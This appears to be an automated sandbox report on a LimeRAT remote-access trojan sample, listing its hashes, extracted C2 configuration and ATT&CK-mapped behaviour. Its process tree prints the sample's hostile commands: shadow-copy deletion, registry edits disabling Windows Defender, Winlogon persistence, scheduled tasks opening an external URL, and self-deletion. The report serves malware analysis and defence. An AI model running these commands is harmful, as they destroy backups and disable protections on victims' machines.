limerat | ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91

Analysis

max time kernel
299s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
26-04-2024 19:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

252KB
MD5

7746b64cfda991754c277e8dbfcb12bf
SHA1

f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256

ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA512

04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334
SSDEEP

6144:tEIE/UVPy/oCa+LDZWC9z589b2vknq1dis4N:iIzPygCa+DZQnq1cP

Score

10^/10

limerat evasion persistence ransomware rat trojan

Malware Config

Extracted

Family

limerat

Wallets

False

Attributes

aes_key
adminsigma5214881939pashalko
antivm
false
c2_url
https://pastebin.com/raw/DDTVwwbu
download_payload
false
install
true
install_name
MIcrosoft Teams.exe
main_folder
True
payload_url
True
pin_spread
true
sub_folder
False
usb_spread
true

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/2700-0-0x000002A0BFCA0000-0x000002A0BFCE4000-memory.dmp	disable_win_def
C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Client.exeAdminMIcrosoft TeamsMIcrosoft Teams.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\""	Client.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\""	AdminMIcrosoft TeamsMIcrosoft Teams.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

Client.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Client.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Client.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

Client.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" Client.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Client.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation Client.exe
Executes dropped EXE 1 IoCs

Processes:

AdminMIcrosoft TeamsMIcrosoft Teams.exe

pid process

3820 AdminMIcrosoft TeamsMIcrosoft Teams.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	Client.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	Client.exe

pid	process
3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe

Enumerates connected drives 3 TTPs 15 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

Processes:

flow	ioc
8	iplogger.org
22	pastebin.com
23	pastebin.com
25	pastebin.com
31	pastebin.com
14	pastebin.com
18	pastebin.com
20	pastebin.com
26	pastebin.com
29	pastebin.com
30	pastebin.com
16	pastebin.com
17	pastebin.com
24	pastebin.com
27	pastebin.com
32	pastebin.com
35	pastebin.com
36	pastebin.com
19	pastebin.com
21	pastebin.com
28	pastebin.com
34	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1092 schtasks.exe
2996 schtasks.exe
1692 schtasks.exe
2380 schtasks.exe
3684 schtasks.exe
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

pid	process
1092	schtasks.exe
2996	schtasks.exe
1692	schtasks.exe
2380	schtasks.exe
3684	schtasks.exe

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
4232	vssadmin.exe
3980	vssadmin.exe
4724	vssadmin.exe
2996	vssadmin.exe
3868	vssadmin.exe
4928	vssadmin.exe
3244	vssadmin.exe
2188	vssadmin.exe
2864	vssadmin.exe
4204	vssadmin.exe
4748	vssadmin.exe
2412	vssadmin.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4128 PING.EXE

pid	process
4128	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

Client.exepowershell.exeAdminMIcrosoft TeamsMIcrosoft Teams.exe

pid	process
2700	Client.exe
2700	Client.exe
2700	Client.exe
4016	powershell.exe
4016	powershell.exe
3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe
3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe
3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe
3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

Client.exepowershell.exevssvc.exeAdminMIcrosoft TeamsMIcrosoft Teams.exe

description	pid	process
Token: SeDebugPrivilege	2700	Client.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeBackupPrivilege	400	vssvc.exe
Token: SeRestorePrivilege	400	vssvc.exe
Token: SeAuditPrivilege	400	vssvc.exe
Token: SeBackupPrivilege	2700	Client.exe
Token: SeSecurityPrivilege	2700	Client.exe
Token: SeBackupPrivilege	2700	Client.exe
Token: SeDebugPrivilege	3820	AdminMIcrosoft TeamsMIcrosoft Teams.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Client.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2700 wrote to memory of 4016	2700	Client.exe	powershell.exe
PID 2700 wrote to memory of 4016	2700	Client.exe	powershell.exe
PID 2700 wrote to memory of 1080	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 1080	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4492	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4492	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3400	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3400	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4924	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4924	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4028	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 4028	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3588	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3588	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2388	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2388	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3820	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3820	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2900	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2900	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2872	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 2872	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3860	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 3860	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 1480	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 1480	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 1236	2700	Client.exe	cmd.exe
PID 2700 wrote to memory of 1236	2700	Client.exe	cmd.exe
PID 4028 wrote to memory of 4928	4028	cmd.exe	vssadmin.exe
PID 4028 wrote to memory of 4928	4028	cmd.exe	vssadmin.exe
PID 1080 wrote to memory of 3244	1080	cmd.exe	vssadmin.exe
PID 1080 wrote to memory of 3244	1080	cmd.exe	vssadmin.exe
PID 1236 wrote to memory of 2188	1236	cmd.exe	vssadmin.exe
PID 1236 wrote to memory of 2188	1236	cmd.exe	vssadmin.exe
PID 4492 wrote to memory of 4712	4492	cmd.exe	vssadmin.exe
PID 4492 wrote to memory of 4712	4492	cmd.exe	vssadmin.exe
PID 1480 wrote to memory of 4232	1480	cmd.exe	vssadmin.exe
PID 1480 wrote to memory of 4232	1480	cmd.exe	vssadmin.exe
PID 4924 wrote to memory of 3980	4924	cmd.exe	vssadmin.exe
PID 4924 wrote to memory of 3980	4924	cmd.exe	vssadmin.exe
PID 2388 wrote to memory of 4724	2388	cmd.exe	vssadmin.exe
PID 2388 wrote to memory of 4724	2388	cmd.exe	vssadmin.exe
PID 3860 wrote to memory of 2996	3860	cmd.exe	vssadmin.exe
PID 3860 wrote to memory of 2996	3860	cmd.exe	vssadmin.exe
PID 2900 wrote to memory of 4204	2900	cmd.exe	vssadmin.exe
PID 2900 wrote to memory of 4204	2900	cmd.exe	vssadmin.exe
PID 3400 wrote to memory of 4748	3400	cmd.exe	vssadmin.exe
PID 3400 wrote to memory of 4748	3400	cmd.exe	vssadmin.exe
PID 2872 wrote to memory of 2412	2872	cmd.exe	vssadmin.exe
PID 2872 wrote to memory of 2412	2872	cmd.exe	vssadmin.exe
PID 3588 wrote to memory of 3868	3588	cmd.exe	vssadmin.exe
PID 3588 wrote to memory of 3868	3588	cmd.exe	vssadmin.exe
PID 3820 wrote to memory of 2864	3820	cmd.exe	vssadmin.exe
PID 3820 wrote to memory of 2864	3820	cmd.exe	vssadmin.exe
PID 2700 wrote to memory of 3684	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 3684	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 2996	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 2996	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 1092	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 1092	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 1692	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 1692	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 2380	2700	Client.exe	schtasks.exe
PID 2700 wrote to memory of 2380	2700	Client.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4016
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3244
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4492
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:4712
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4748
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3980
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4928
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3868
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4724
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2864
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4204
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2412
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3860
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2996
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4232
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2188
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "17:16" /sc daily /mo "4" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"
  2⤵
  - Creates scheduled task(s)
  PID:3684
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "10:34" /sc daily /mo "4" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"
  2⤵
  - Creates scheduled task(s)
  PID:2996
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "23:36" /sc daily /mo "3" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"
  2⤵
  - Creates scheduled task(s)
  PID:1092
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "21:51" /sc weekly /mo "4" /d "Wed" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"
  2⤵
  - Creates scheduled task(s)
  PID:1692
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "03:56" /sc monthly /m "aug" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"
  2⤵
  - Creates scheduled task(s)
  PID:2380
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  PID:4852
- - C:\Windows\system32\PING.EXE
    ping 0 -n 2
    3⤵
    - Runs ping.exe
    PID:4128
- C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe
  "C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3820

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe

Filesize
252KB

MD5
7746b64cfda991754c277e8dbfcb12bf

SHA1
f3d05a15cf7c4f1d07bca938076cb53df9c39e16

SHA256
ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91

SHA512
04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ios3r5dc.vss.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2700-20-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

Filesize
10.8MB

Download
memory/2700-2-0x000002A0DA400000-0x000002A0DA410000-memory.dmp

Filesize
64KB

Download
memory/2700-0-0x000002A0BFCA0000-0x000002A0BFCE4000-memory.dmp

Filesize
272KB

Download
memory/2700-21-0x000002A0DA400000-0x000002A0DA410000-memory.dmp

Filesize
64KB

Download
memory/2700-1-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

Filesize
10.8MB

Download
memory/2700-33-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

Filesize
10.8MB

Download
memory/4016-3-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

Filesize
10.8MB

Download
memory/4016-5-0x0000024D7D6C0000-0x0000024D7D6D0000-memory.dmp

Filesize
64KB

Download
memory/4016-4-0x0000024D7D6C0000-0x0000024D7D6D0000-memory.dmp

Filesize
64KB

Download
memory/4016-15-0x0000024D7DE00000-0x0000024D7DE22000-memory.dmp

Filesize
136KB

Download
memory/4016-18-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

Filesize
10.8MB

Download